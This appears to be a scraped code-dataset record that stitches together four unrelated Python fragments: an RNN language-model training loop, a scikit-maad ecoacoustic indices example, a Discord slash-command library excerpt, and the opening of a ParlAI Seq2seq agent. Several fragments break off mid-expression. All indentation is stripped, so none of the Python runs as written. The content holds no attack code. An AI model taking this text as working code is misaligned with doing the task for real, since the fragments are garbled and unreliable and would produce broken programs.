# Load data
###############################################################################
def model_save(fn):
if args.philly:
fn = os.path.join(os.environ['PT_OUTPUT_DIR'], fn)
with open(fn, 'wb') as f:
torch.save([epoch, model, criterion, optimizer], f)
def model_load(fn):
global epoch, model, criterion, optimizer
if args.philly:
fn = os.path.join(os.environ['PT_OUTPUT_DIR'], fn)
with open(fn, 'rb') as f:
epoch, model, criterion, optimizer = torch.load(f)
fn = 'corpus.{}.data'.format(hashlib.md5(args.data.encode()).hexdigest())
if args.philly:
fn = os.path.join(os.environ['PT_OUTPUT_DIR'], fn)
if os.path.exists(fn) and args.data != 'data/syntactic_penn/':
print('Loading cached dataset...')
corpus = torch.load(fn)
else:
print('Producing dataset...')
corpus = data.syntactic_penn(args, args.batch_size_init,args.dratio)
torch.save(corpus, fn)
train_data = corpus[0]
train_dist = corpus[1]
val_data = corpus[2]
test_data = corpus[3]
args.vocab_size = len(corpus[4])
print("done loading, vocabulary size: {}".format(args.vocab_size))
eval_batch_size=80
test_batch_size=1
###############################################################################
# Build the model
###############################################################################
criterion = None
ntokens = args.vocab_size
model = model.RNNModel(args.model, ntokens, args.emsize, args.nhid,
args.chunk_size, args.nlayers, args.wds,args.dropout,
args.dropouth, args.dropouti, args.dropoute,
args.wdrop, args.tied, args.l4d)
###
start_epoch = 0
if os.path.exists(save_string):
print('Resuming model ...')
model_load(save_string)
start_epoch = epoch
optimizer.param_groups[0]['lr'] = args.lr
model.dropouti, model.dropouth, model.dropout, args.dropoute = \
args.dropouti, args.dropouth, args.dropout, args.dropoute
if args.wdrop:
for rnn in model.rnn.cells:
rnn.hh.dropout = args.wdrop
###
if not criterion:
splits = []
if ntokens > 500000:
# One Billion
# This produces fairly even matrix mults for the buckets:
# 0: 11723136, 1: 10854630, 2: 11270961, 3: 11219422
splits = [4200, 35000, 180000]
elif ntokens > 75000:
# WikiText-103
splits = [2800, 20000, 76000]
print('Using', splits)
criterion = SplitCrossEntropyLoss(args.emsize, splits=splits, verbose=False)
###
if args.cuda:
model = model.cuda()
criterion = criterion.cuda()
###
params = list(model.parameters()) + list(criterion.parameters())
total_params = sum(x.size()[0] * x.size()[1] if len(x.size()) > 1 else x.size()[0] for x in params if x.size())
print('Args:', args)
print('Model total parameters:', total_params)
###############################################################################
# Training code
###############################################################################
@torch.no_grad()
def evaluate(data_source, batch_size=10):
# Turn on evaluation mode which disables dropout.
model.eval()
if args.model == 'QRNN': model.reset()
total_loss = 0
ntokens = args.vocab_size
hidden = model.init_hidden(batch_size)
for i in range(0, data_source.size(0) - 1, args.bptt):
data, targets = get_batch(data_source, i, args, evaluation=True)
output, hidden = model(data, hidden)
total_loss += len(data) * criterion(model.decoder.weight,
model.decoder.bias,
output, targets).data
hidden = repackage_hidden(hidden)
return total_loss.item() / len(data_source)
def train(train_batch_size):
# Turn on training mode which enables dropout.
if args.model == 'QRNN': model.reset()
total_loss = total_sdloss = 0
start_time = time.time()
ntokens = args.vocab_size
hidden = model.init_hidden(train_batch_size)
batch, i = 0, 0
train_data_full_size = train_data.size(0) - 1 - 1
while i < train_data_full_size:
bptt = args.bptt if np.random.random() < 0.95 else args.bptt / 2.
# Prevent excessively small or negative sequence lengths
seq_len = max(5, int(np.random.normal(bptt, 5)))
# There's a very small chance that it could select a very long sequence
# length resulting in OOM seq_len = min(seq_len, args.bptt + 10)
lr2 = optimizer.param_groups[0]['lr']
optimizer.param_groups[0]['lr'] = lr2 * seq_len / args.bptt
model.train()
data, targets = get_batch(train_data, i, args, seq_len=seq_len)
dist, _ = get_batch(train_dist, i, args, seq_len=seq_len)
# Starting each batch, we detach the hidden state from how it was
# previously produced. If we didn't, the model would try
# backpropagating all the way to start of the dataset.
hidden = repackage_hidden(hidden)
optimizer.zero_grad()
output, hidden, rnn_hs, dropped_rnn_hs = model(data, hidden, return_h=True)
# output, hidden = model(data, hidden, return_h=False)
raw_loss = criterion(model.decoder.weight, model.decoder.bias, output, targets)
loss = raw_loss
# Activiation Regularization
if args.alpha:
loss = loss + sum(
args.alpha * dropped_rnn_h.pow(2).mean()
for dropped_rnn_h in dropped_rnn_hs[-1:]
)
# Temporal Activation Regularization (slowness)
if args.beta:
loss = loss + sum(
args.beta * (rnn_h[1:] - rnn_h[:-1]).pow(2).mean()
for rnn_h in rnn_hs[-1:]
)
forget_distance = model.distance[1]
if args.l4d >= 0:
single_layer_distance = forget_distance[args.l4d]
distance_loss = rankloss(single_layer_distance, dist, margin=args.margin)
else:
distance_loss = rankloss(forget_distance[0], dist, margin=args.margin) \
+ rankloss(forget_distance[2], dist, margin=args.margin)
if i < train_data_full_size * args.sratio:
sd_loss = args.alpha1 * loss + args.alpha2 * distance_loss
else:
sd_loss = loss
if args.penn_only:
loss.backward()
else:
sd_loss.backward()
# `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
if args.clip: torch.nn.utils.clip_grad_norm_(params, args.clip)
optimizer.step()
total_loss += raw_loss.data
total_sdloss += sd_loss.data
optimizer.param_groups[0]['lr'] = lr2
if batch % args.log_interval == 0 and batch > 0:
cur_loss = total_loss.item() / args.log_interval
cur_sdloss = total_sdloss.item() / args.log_interval
elapsed = time.time() - start_time
print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:05.5f} | ms/batch {:5.2f} | '
'loss {:5.2f} | ppl {:8.2f} | bpc {:8.3f} | dist {:2.5f}'.format(
epoch, batch, len(train_data) // args.bptt, optimizer.param_groups[0]['lr'],
elapsed * 1000 / args.log_interval, cur_loss,
math.exp(cur_loss), cur_loss /
math.log(2),cur_sdloss))
total_loss = total_sdloss = 0
start_time = time.time()
###
batch += 1
i += seq_len
# Loop over epochs.
lr = args.lr
best_val_loss = []
stored_loss = 100000000
# At any point you can hit Ctrl + C to break out of training early.
try:
optimizer = None
# Ensure the optimizer is optimizing params, which includes both the
# model's weights as well as the criterion's weight (i.e. Adaptive Softmax)
if args.optimizer == 'sgd':
optimizer = torch.optim.SGD(params, lr=args.lr, weight_decay=args.wdecay)
if args.optimizer == 'adam':
optimizer = torch.optim.Adam(params, lr=args.lr, betas=(0, 0.999),
eps=1e-9, weight_decay=args.wdecay)
scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, 'min', 0.5,
patience=2, threshold=0)
for epoch in range(start_epoch + 1, args.epochs + 1):
if epoch <= args.finetuning:
train_batch_size = args.batch_size_init
else:
train_batch_size = args.batch_size_tune
epoch_start_time = time.time()
train(train_batch_size)
if 't0' in optimizer.param_groups[0]:
tmp = {}
for prm in model.parameters():
tmp[prm] = prm.data.clone()
prm.data = optimizer.state[prm]['ax'].clone()
val_loss2 = evaluate(val_data, eval_batch_size)
print('-' * 89)
print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '
'valid ppl {:8.2f} | valid bpc {:8.3f}'.format(
epoch, (time.time() - epoch_start_time), val_loss2,
math.exp(val_loss2), val_loss2 / math.log(2)))
print('-' * 89)
if val_loss2 < stored_loss:
model_save(save_string)
print('Saving Averaged!')
stored_loss = val_loss2
for prm in model.parameters():
prm.data = tmp[prm].clone()
if epoch == args.finetuning:
print('Switching to finetuning')
optimizer = torch.optim.ASGD(model.parameters(), lr=args.lr,
t0=0, lambd=0.,
weight_decay=args.wdecay)
best_val_loss = []
if (epoch > args.finetuning and
len(best_val_loss) > args.nonmono and
val_loss2 > min(best_val_loss[:-args.nonmono])):
print('Done!')
import sys
sys.exit(1)
else:
val_loss = evaluate(val_data, eval_batch_size)
print('-' * 89)
print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '
'valid ppl {:8.2f} | valid bpc {:8.3f}'.format(
epoch, (time.time() | |
<reponame>jflatorreg/scikit-maad
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 6 17:59:44 2018
This script gives an example of how to use scikit-MAAD for ecoacoustics indices
"""
#
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: New BSD License
print(__doc__)
# Clear all the variables
from IPython import get_ipython
get_ipython().magic('reset -sf')
# =============================================================================
# Load the modules
# =============================================================================
import matplotlib.pyplot as plt
import pandas as pd # for csv
import numpy as np
from numpy import sum, log, log10, min, max, abs, mean, median, sqrt, diff
from skimage import filters
# min value
import sys
_MIN_ = sys.float_info.min
# =============================================================================
# ############## Import MAAD module
from pathlib import Path # in order to be wind/linux/MacOS compatible
import os
# change the path to the current path where the script is located
# Get the current dir of the current file
dir_path = os.path.dirname(os.path.realpath('__file__'))
os.chdir(dir_path)
maad_path = Path(dir_path).parents[0]
os.sys.path.append(maad_path.as_posix())
import maad
# Close all the figures (like in Matlab)
plt.close("all")
"""****************************************************************************
# ------------------- options ---------------------------
****************************************************************************"""
# root directory of the files
base_path = Path(__file__).parent
datadir = (base_path / "../data/").resolve()
savedir = datadir
save_csv = 'results_indices.csv'
CHANNEL = 'left'
MODE_ENV = 'fast' # 'fast' #'hilbert'
Nt = 512 # frame size (in points)
N = 1024 # fft size (in points)
NOVLP = N//2 # N//2
WIN = 'hanning' #'boxcar' hanning'
dB_RANGE = 120
dB_GAIN = 0
FREQ_ANTHRO_MIN = 0
FREQ_ANTHRO_MAX = 1000
FREQ_BIO_MIN = 1000
FREQ_BIO_MAX = 15000
FREQ_INSECT_MIN = 15000
FREQ_INSECT_MAX = 20000
ANTHRO_BAND = (FREQ_ANTHRO_MIN, FREQ_ANTHRO_MAX)
BIO_BAND = (FREQ_BIO_MIN,FREQ_BIO_MAX)
INSECT_BAND = (FREQ_INSECT_MIN,FREQ_INSECT_MAX)
DISPLAY = False
"""****************************************************************************
# ------------------- end options ---------------------------
****************************************************************************"""
"""****************************************************************************
# -------------- LOAD SOUND AND PREPROCESS SOUND ---------------------------
****************************************************************************"""
"""****************************************************************************
# -------------- LOAD SOUND AND PREPROCESS SOUND ---------------------------
****************************************************************************"""
# parse a directory in order to get a df with date and fullfilename
df = maad.util.date_parser(datadir)
# select the files
# =============================================================================
# ##### EXAMPLES
# #see https://pandas.pydata.org/pandas-docs/sdf/timeseries.html
# # Returning an array containing the hours for each row in your dataframe
# df.index.hour
# # grab all rows where the time is between 12h and 13h,
# df.between_time('12:00:00','13:00:00')
# # Increment the time by 1 microsecond
# df.index = df.index+ pd.Timedelta(microseconds=1)
# date_selec = pd.date_range('2018-07-14', '2018-07-20')
# =============================================================================
## Select data between date range
#T0 = '2019-03-01 00:00:00'
#T1 = '2019-04-01 00:00:00'
#sub_df = df[T0:T1]
# or keep all data
sub_df = df
# or select a row (= a single file)
sub_df = df.iloc[0:4]
# define the indices' lists
# c_ for column_
N_FILE = len(sub_df)
c_file = []
c_clipping = []
c_BGNt = []
c_SNRt = []
c_M = []
c_ENT = []
c_ACTtFraction= []
c_ACTtCount= []
c_ACTtMean= []
c_EVNtSsum= []
c_EVNtMean= []
c_EVNtCount= []
c_BGNf= []
c_SNRf= []
c_EAS= []
c_ECU= []
c_ECV= []
c_EPS= []
c_H= []
c_ACI= []
c_NDSI= []
c_rBA= []
c_BI= []
c_ADI= []
c_AEI= []
c_ROU= []
c_LFC= []
c_MFC= []
c_HFC = []
c_ACTspFraction= []
c_ACTspCount= []
c_ACTspMean = []
c_EVNspSum= []
c_EVNspMean= []
c_EVNspCount= []
c_LTR = []
for index, row in sub_df.iterrows() :
# get the full filename of the corresponding row
fullfilename = row['file']
# Save file basename
path, filename = os.path.split(fullfilename)
savefile_base = filename[0:-4]
savefile = os.path.join(savedir,savefile_base)
print ('\n***********************')
print (filename)
"""========================================================================
===========================================================================
Computation in the time domain
===========================================================================
======================================================================= """
#### Load the original sound
try :
wave,fs = maad.sound.load(filename=fullfilename, channel=CHANNEL, detrend=True, verbose=False)
except:
# Delete the row if the file does not exist or raise a value error (i.e. no EOF)
sub_df.drop(index, inplace=True)
continue
#### Highpass signal (10Hz)f
#wave = iir_filter1d(wave,fs,fcut=10,forder=10,fname='butter',ftype='highpass')
#### Envelope (mode fast => see TOWSEY)
env = maad.ecoacoustics.envelope(wave, mode=MODE_ENV, N=Nt)
envdB = maad.util.linear2dB(env, mode='amplitude')
# time step
if MODE_ENV == 'fast' : dt_env=1/fs*Nt
if MODE_ENV == 'hilbert' : dt_env=1/fs
# Time vector
WAVE_DURATION = len(wave)/fs
tn = np.arange(0,len(env),1)*WAVE_DURATION/len(env)
#### Background noise estimation
"""BGNt [TOWSEY] """
BKdB_t = maad.util.get_unimode (envdB, mode ='ale', axis=1, verbose=False, display=False)
BK_t = maad.util.dB2linear(BKdB_t, db_gain=dB_GAIN, mode = 'amplitude') # transform bgn in dB back to amplitude
BGNt = BKdB_t
#### Signal to Noise ratio estimation
""" SNRt [TOWSEY] """
SNRt = max(envdB) - BGNt
#### Env in dB without noise
envdBSansNoise = envdB - BKdB_t
envdBSansNoise [ envdBSansNoise<0] = 0
# Display the wave, the envelope and the background noise (red line),
# in linear and dB scale
if DISPLAY :
# linear representation
fig1, ax1 = plt.subplots()
ax1.plot(tn, env, lw=0.2, alpha=1)
ax1.fill_between(tn,env,0, alpha=0.5)
ax1.axhline(BK_t, color='red', lw=1, alpha=0.5)
ax1.set_title('Waveform, envelope and background noise')
ax1.set_xlabel('Time [sec]')
# dB representation
fig2, ax2 = plt.subplots()
ax2.fill_between(tn,envdB,-50, alpha=0.75)
ax2.axhline(BKdB_t, color='red', lw=1, alpha=0.5)
ax2.set_title('Envelope in dB and background noise')
ax2.set_xlabel('Time [sec]')
# dB representation
fig3, ax3 = plt.subplots()
ax3.fill_between(tn,envdBSansNoise,0, alpha=0.75)
ax3.set_title('Envelope in dB without background noise')
ax3.set_xlabel('Time [sec]')
#### Median
"""
COMMENT : Result a bit different due to different Hilbert implementation
"""
MED = median(env)
print("median %2.5f" % MED)
""" =======================================================================
ENTROPY : Entropy is a measure of ENERGY dispersal => square the amplitude.
TEMPORAL ENTROPY => value<0.7 indicates a brief concentration of energy
(few seconds)
value close 1 indicates no peak events but rather
smooth sound or noise.
======================================================================= """
#### temporal entropy from the envelope's amplitude [SUEUR] or energy [TOWSEY]
""" ENT [TOWSEY] """
"""
COMMENT : Result a bit different due to different envelope estimation
implementation
"""
Ht = maad.ecoacoustics.entropy(env**2)
ENT = 1 - Ht
print("Ht %2.5f" % Ht)
"""**************************** Activity *******************************"""
""" ACT & EVN [TOWSEY] """
ACTtFraction, ACTtCount, ACTtMean = maad.ecoacoustics.acoustic_activity (envdBSansNoise,
dB_threshold=6, axis=0)
EVNtSsum, EVNtMean, EVNtCount, EVNt = maad.ecoacoustics.acoustic_events (envdBSansNoise,
dB_threshold=6,
dt=dt_env, rejectDuration=None)
ACT = ACTtFraction
EVN = EVNtMean
# display a portion of the signal (0,20)
if DISPLAY :
fig3, ax3 = plt.subplots()
ax3.plot(tn, env/max(abs(env)), lw=0.5, alpha=1)
plt.fill_between(tn, 0, EVNt*1,color='red',alpha=0.5)
ax3.set_title('Detected Events from the envelope without noise')
ax3.set_xlabel('Time [sec]')
""" =======================================================================
===========================================================================
Computation in the frequency domain
===========================================================================
========================================================================"""
#### spectrogram => mode : 'amplitude' or 'psd'
PSDxx,tn,fn,_ = maad.sound.spectrogramPSD (wave, fs,
window=WIN, noverlap=NOVLP, nfft=N,
fcrop=None, tcrop=None,
verbose=False, display=DISPLAY,
savefig = None)
# index of the selected bandwidth
iANTHRO_BAND = maad.ecoacoustics.index_bw(fn,ANTHRO_BAND)
iBIO_BAND = maad.ecoacoustics.index_bw(fn,BIO_BAND)
iINSECT_BAND = maad.ecoacoustics.index_bw(fn,INSECT_BAND)
""" ******************** TO CHECK """
#### Smoothing of the spectrogram (like TOWSEY)
#PSDxx = fir_filter(PSDxx,kernel=('boxcar',3), axis=1)
#PSDxx = fir_filter(PSDxx,kernel=('boxcar',3), axis=0)
""" ******************** END TO CHECK """
#### PSD spectrogram PSDxx to amplitude spectrogram Sxx
Sxx = sqrt(PSDxx)
#### Average Spectrum and PSD (better to compute the mean on the PSD)
mean_PSD = mean(PSDxx, axis = 1)
#### convert into dB
SxxdB = maad.util.linear2dB(Sxx, mode='amplitude')
PSDxxdB = maad.util.linear2dB(PSDxx, mode ='power')
# display MEAN PSD SPECTROGRAM in dB [anthropological and Biological bands]
if DISPLAY :
fig5, ax5 = plt.subplots()
ax5.plot(fn[iANTHRO_BAND],
maad.util.linear2dB(mean_PSD[iANTHRO_BAND], mode ='power'),
color='#555555', lw=2, alpha=1)
ax5.plot(fn[iBIO_BAND],
maad.util.linear2dB(mean_PSD[iBIO_BAND], mode ='power'),
color='#55DD00', lw=2, alpha=1)
ax5.plot(fn[iINSECT_BAND],
maad.util.linear2dB(mean_PSD[iINSECT_BAND], mode ='power'),
color='#DDDC00', lw=2, alpha=1)
#### Noise estimation
"""BGNf [TOWSEY] """
"""
COMMENT : Result a bit different due to smoothing
"""
BKdB_f = maad.util.get_unimode (PSDxxdB, mode ='ale', axis=1,
verbose=False, display=False)
""" ******************** TO CHECK """
# smooth the noise profile
#BKdB_f = fir_filter(BKdB_f,kernel=('boxcar', 3), axis=0)
""" ******************** TO CHECK """
BGNf = BKdB_f
if DISPLAY :
ax5.plot(fn[iANTHRO_BAND],
BKdB_f[iANTHRO_BAND], 'r--', lw=2, alpha=0.5)
ax5.plot(fn[iBIO_BAND],
BKdB_f[iBIO_BAND], 'r--', lw=2, alpha=0.5)
ax5.plot(fn[iINSECT_BAND],
BKdB_f[iINSECT_BAND], 'r--', lw=2, alpha=0.5)
ax5.set_title('Mean PSD and uniform background noise (dash)')
ax5.set_xlabel('Frequency [Hz]')
ax5.axis('tight')
""" Parseval : energy conservation from temporal domain to frequency domain """
print ('Parseval : energy conservation from temporal domain to frequency domain')
print ('=> if N < 4096, the conservation is not preserved due to noise')
energy_wav = sum(wave**2)
print ('NRJ from wav : %2.5f' % energy_wav)
energy_PSD = sum(PSDxx/PSDxx.shape[1]*len(wave))
print ('NRJ from PSDxy : %2.5f' % energy_PSD)
energy_PSD2 = sum(mean_PSD*len(wave))
print ('NRJ from mean(PSDxy) : %2.5f' % energy_PSD2)
#### Signal to Noise ratio estimation
""" SNRf [TOWSEY] """
SNRf = max(PSDxxdB[iBIO_BAND]) - maad.util.linear2dB(mean(maad.util.dB2linear(BKdB_f[iBIO_BAND], mode='power')),mode='power')
""" Spectrogram in dB without noise """
# Remove background noise (BGNf is an estimation) and negative value to zero
PSDxxdB_SansNoise =PSDxxdB - BKdB_f[..., np.newaxis]
PSDxxdB_SansNoise[PSDxxdB_SansNoise<0] =0
""" ******************** OPTION TO CHECK """
# # TOWSEY : smooth the spectro and set value lower than threshold (2dB in Towsey
# # here the threshold is evaluated as the background value) to 0
# SxxdB_SansNoise_smooth = maad.sound.fir_filter(SxxdB_SansNoise,kernel=('boxcar',3), axis=0)
# SxxdB_SansNoise_smooth = maad.sound.fir_filter(SxxdB_SansNoise_smooth,kernel=('boxcar',3), axis=1)
# thresh = filters.threshold_li(SxxdB_SansNoise_smooth)
# SxxdB_SansNoise[SxxdB_SansNoise_smooth<thresh] =_MIN_
""" ******************** OPTION TO CHECK """
# Conversion dB to linear
PSDxx_SansNoise = maad.util.dB2linear(PSDxxdB_SansNoise, | |
None,
connector: dict = None,
):
"""
Decorator that registers coroutine as a slash command.\n
All decorator args must be passed as keyword-only args.\n
1 arg for command coroutine is required for ctx(:class:`.model.SlashContext`),
and if your slash command has some args, then those args are also required.\n
All args must be passed as keyword-args.
.. note::
If you don't pass `options` but has extra args, then it will automatically generate options.
However, it is not recommended to use it since descriptions will be "No Description." or the command's description.
.. warning::
Unlike discord.py's command, ``*args``, keyword-only args, converters, etc. are not supported or behave differently.
Example:
.. code-block:: python
@slash.slash(name="ping")
async def _slash(ctx): # Normal usage.
await ctx.send(content=f"Pong! (`{round(bot.latency*1000)}`ms)")
@slash.slash(name="pick")
async def _pick(ctx, choice1, choice2): # Command with 1 or more args.
await ctx.send(content=str(random.choice([choice1, choice2])))
To format the connector, follow this example.
.. code-block:: python
{
"example-arg": "example_arg",
"시간": "hour"
# Formatting connector is required for
# using other than english for option parameter name
# for in case.
}
Set discord UI's parameter name as key, and set command coroutine's arg name as value.
:param name: Name of the slash command. Default name of the coroutine.
:type name: str
:param description: Description of the slash command. Default ``None``.
:type description: str
:param guild_ids: List of Guild ID of where the command will be used. Default ``None``, which will be global command.
:type guild_ids: List[int]
:param options: Options of the slash command. This will affect ``auto_convert`` and command data at Discord API. Default ``None``.
:type options: List[dict]
:param default_permission: Sets if users have permission to run slash command by default, when no permissions are set. Default ``True``.
:type default_permission: bool
:param permissions: Permission requirements of the slash command. Default ``None``.
:type permissions: dict
:param connector: Kwargs connector for the command. Default ``None``.
:type connector: dict
"""
if not permissions:
permissions = {}
def wrapper(cmd):
decorator_permissions = getattr(cmd, "__permissions__", None)
if decorator_permissions:
permissions.update(decorator_permissions)
obj = self.add_slash_command(
cmd,
name,
description,
guild_ids,
options,
default_permission,
permissions,
connector,
)
return obj
return wrapper
def subcommand(
self,
*,
base,
subcommand_group=None,
name=None,
description: str = None,
base_description: str = None,
base_desc: str = None,
base_default_permission: bool = True,
base_permissions: dict = None,
subcommand_group_description: str = None,
sub_group_desc: str = None,
guild_ids: typing.List[int] = None,
options: typing.List[dict] = None,
connector: dict = None,
):
"""
Decorator that registers subcommand.\n
Unlike discord.py, you don't need base command.\n
All args must be passed as keyword-args.
.. note::
If you don't pass `options` but has extra args, then it will automatically generate options.
However, it is not recommended to use it since descriptions will be "No Description." or the command's description.
.. warning::
Unlike discord.py's command, ``*args``, keyword-only args, converters, etc. are not supported or behave differently.
Example:
.. code-block:: python
# /group say <str>
@slash.subcommand(base="group", name="say")
async def _group_say(ctx, _str):
await ctx.send(content=_str)
# /group kick user <user>
@slash.subcommand(base="group",
subcommand_group="kick",
name="user")
async def _group_kick_user(ctx, user):
...
:param base: Name of the base command.
:type base: str
:param subcommand_group: Name of the subcommand group, if any. Default ``None`` which represents there is no sub group.
:type subcommand_group: str
:param name: Name of the subcommand. Default name of the coroutine.
:type name: str
:param description: Description of the subcommand. Default ``None``.
:type description: str
:param base_description: Description of the base command. Default ``None``.
:type base_description: str
:param base_desc: Alias of ``base_description``.
:param default_permission: Sets if users have permission to run slash command by default, when no permissions are set. Default ``True``.
:type default_permission: bool
:param permissions: Permission requirements of the slash command. Default ``None``.
:type permissions: dict
:param subcommand_group_description: Description of the subcommand_group. Default ``None``.
:type subcommand_group_description: str
:param sub_group_desc: Alias of ``subcommand_group_description``.
:param guild_ids: List of guild ID of where the command will be used. Default ``None``, which will be global command.
:type guild_ids: List[int]
:param options: Options of the subcommand. This will affect ``auto_convert`` and command data at Discord API. Default ``None``.
:type options: List[dict]
:param connector: Kwargs connector for the command. Default ``None``.
:type connector: dict
"""
base_description = base_description or base_desc
subcommand_group_description = subcommand_group_description or sub_group_desc
if not base_permissions:
base_permissions = {}
def wrapper(cmd):
decorator_permissions = getattr(cmd, "__permissions__", None)
if decorator_permissions:
base_permissions.update(decorator_permissions)
obj = self.add_subcommand(
cmd,
base,
subcommand_group,
name,
description,
base_description,
base_default_permission,
base_permissions,
subcommand_group_description,
guild_ids,
options,
connector,
)
return obj
return wrapper
def permission(self, guild_id: int, permissions: list):
"""
Decorator that add permissions. This will set the permissions for a single guild, you can use it more than once for each command.
:param guild_id: ID of the guild for the permissions.
:type guild_id: int
:param permissions: List of permissions to be set for the specified guild.
:type permissions: list
"""
def wrapper(cmd):
if not getattr(cmd, "__permissions__", None):
cmd.__permissions__ = {}
cmd.__permissions__[guild_id] = permissions
return cmd
return wrapper
def add_component_callback(
self,
callback: typing.Coroutine,
*,
messages: typing.Union[int, discord.Message, list] = None,
components: typing.Union[str, dict, list] = None,
use_callback_name=True,
component_type: int = None,
):
"""
Adds a coroutine callback to a component.
Callback can be made to only accept component interactions from a specific messages
and/or custom_ids of components.
:param Coroutine callback: The coroutine to be called when the component is interacted with. Must accept a single argument with the type :class:`.context.ComponentContext`.
:param messages: If specified, only interactions from the message given will be accepted. Can be a message object to check for, or the message ID or list of previous two. Empty list will mean that no interactions are accepted.
:type messages: Union[discord.Message, int, list]
:param components: If specified, only interactions with ``custom_id`` of given components will be accepted. Defaults to the name of ``callback`` if ``use_callback_name=True``. Can be a custom ID (str) or component dict (actionrow or button) or list of previous two.
:type components: Union[str, dict, list]
:param use_callback_name: Whether the ``custom_id`` defaults to the name of ``callback`` if unspecified. If ``False``, either ``messages`` or ``components`` must be specified.
:type use_callback_name: bool
:param component_type: The type of the component to avoid collisions with other component types. See :class:`.model.ComponentType`.
:type component_type: Optional[int]
:raises: .error.DuplicateCustomID, .error.IncorrectFormat
"""
message_ids = list(get_messages_ids(messages)) if messages is not None else [None]
custom_ids = list(get_components_ids(components)) if components is not None else [None]
if use_callback_name and custom_ids == [None]:
custom_ids = [callback.__name__]
if message_ids == [None] and custom_ids == [None]:
raise error.IncorrectFormat("You must specify messages or components (or both)")
callback_obj = model.ComponentCallbackObject(
callback, message_ids, custom_ids, component_type
)
self._add_comp_callback_obj(callback_obj)
return callback_obj
def _add_comp_callback_obj(self, callback_obj):
component_type = callback_obj.component_type
for message_id, custom_id in callback_obj.keys:
self._register_comp_callback_obj(callback_obj, message_id, custom_id, component_type)
def _register_comp_callback_obj(self, callback_obj, message_id, custom_id, component_type):
message_id_dict = self.components
custom_id_dict = message_id_dict.setdefault(message_id, {})
component_type_dict = custom_id_dict.setdefault(custom_id, {})
if component_type in component_type_dict:
raise error.DuplicateCallback(message_id, custom_id, component_type)
component_type_dict[component_type] = callback_obj
self.logger.debug(
f"Added component callback for "
f"message ID {message_id or '<any>'}, "
f"custom_id `{custom_id or '<any>'}`, "
f"component_type `{component_type or '<any>'}`"
)
def extend_component_callback(
self,
callback_obj: model.ComponentCallbackObject,
message_id: int = None,
custom_id: str = None,
):
"""
Registers existing callback object (:class:`.model.ComponentCallbackObject`)
for specific combination of message_id, custom_id, component_type.
:param callback_obj: callback object.
:type callback_obj: model.ComponentCallbackObject
:param message_id: If specified, only removes the callback for the specific message ID.
:type message_id: Optional[.model]
:param custom_id: The ``custom_id`` of the component.
:type custom_id: Optional[str]
:raises: .error.DuplicateCustomID, .error.IncorrectFormat
"""
component_type = callback_obj.component_type
self._register_comp_callback_obj(callback_obj, message_id, custom_id, component_type)
callback_obj.keys.add((message_id, custom_id))
def get_component_callback(
self,
message_id: int = None,
custom_id: str = None,
component_type: int = None,
):
"""
Returns component callback (or None if not found) for specific combination of message_id, custom_id, component_type.
:param message_id: If specified, only removes the callback for the specific message ID.
:type message_id: Optional[.model]
:param custom_id: The ``custom_id`` of the component.
:type custom_id: Optional[str]
:param component_type: The type of the component. See :class:`.model.ComponentType`.
:type component_type: Optional[int]
:return: Optional[model.ComponentCallbackObject]
"""
message_id_dict = self.components
try:
custom_id_dict = _get_val(message_id_dict, message_id)
component_type_dict = _get_val(custom_id_dict, custom_id)
callback = _get_val(component_type_dict, component_type)
| |
<reponame>ricsinaruto/ParlAI
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from .torch_agent_v1 import TorchAgent, Output, Beam
from .utils_v1 import padded_tensor
from .utils_v0 import SharedTable, round_sigfigs
from .modules_v1 import Seq2seq, opt_to_kwargs
import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import defaultdict
import os
import math
import json
import tempfile
class Seq2seqAgent(TorchAgent):
"""Agent which takes an input sequence and produces an output sequence.
This model supports encoding the input and decoding the output via one of
several flavors of RNN. It then uses a linear layer (whose weights can
be shared with the embedding layer) to convert RNN output states into
output tokens. This model supports greedy decoding, selecting the
highest probability token at each time step, as well as beam
search.
For more information, see the following papers:
- Neural Machine Translation by Jointly Learning to Align and Translate
`(Bahdanau et al. 2014) <arxiv.org/abs/1409.0473>`_
- Sequence to Sequence Learning with Neural Networks
`(Sutskever et al. 2014) <arxiv.org/abs/1409.3215>`_
- Effective Approaches to Attention-based Neural Machine Translation
`(Luong et al. 2015) <arxiv.org/abs/1508.04025>`_
"""
@classmethod
def add_cmdline_args(cls, argparser):
"""Add command-line arguments specifically for this agent."""
agent = argparser.add_argument_group('Seq2Seq Arguments')
agent.add_argument('--init-model', type=str, default=None,
help='load dict/model/opts from this path')
agent.add_argument('-hs', '--hiddensize', type=int, default=128,
help='size of the hidden layers')
agent.add_argument('-esz', '--embeddingsize', type=int, default=128,
help='size of the token embeddings')
agent.add_argument('-nl', '--numlayers', type=int, default=2,
help='number of hidden layers')
agent.add_argument('-dr', '--dropout', type=float, default=0.1,
help='dropout rate')
agent.add_argument('-bi', '--bidirectional', type='bool',
default=False,
help='whether to encode the context with a '
'bidirectional rnn')
agent.add_argument('-att', '--attention', default='none',
choices=['none', 'concat', 'general', 'dot',
'local'],
help='Choices: none, concat, general, local. '
'If set local, also set attention-length. '
'(see arxiv.org/abs/1508.04025)')
agent.add_argument('-attl', '--attention-length', default=48, type=int,
help='Length of local attention.')
agent.add_argument('--attention-time', default='post',
choices=['pre', 'post'],
help='Whether to apply attention before or after '
'decoding.')
agent.add_argument('-rnn', '--rnn-class', default='lstm',
choices=Seq2seq.RNN_OPTS.keys(),
help='Choose between different types of RNNs.')
agent.add_argument('-dec', '--decoder', default='same',
choices=['same', 'shared'],
help='Choose between different decoder modules. '
'Default "same" uses same class as encoder, '
'while "shared" also uses the same weights. '
'Note that shared disabled some encoder '
'options--in particular, bidirectionality.')
agent.add_argument('-lt', '--lookuptable', default='unique',
choices=['unique', 'enc_dec', 'dec_out', 'all'],
help='The encoder, decoder, and output modules can '
'share weights, or not. '
'Unique has independent embeddings for each. '
'Enc_dec shares the embedding for the encoder '
'and decoder. '
'Dec_out shares decoder embedding and output '
'weights. '
'All shares all three weights.')
agent.add_argument('-soft', '--numsoftmax', default=1, type=int,
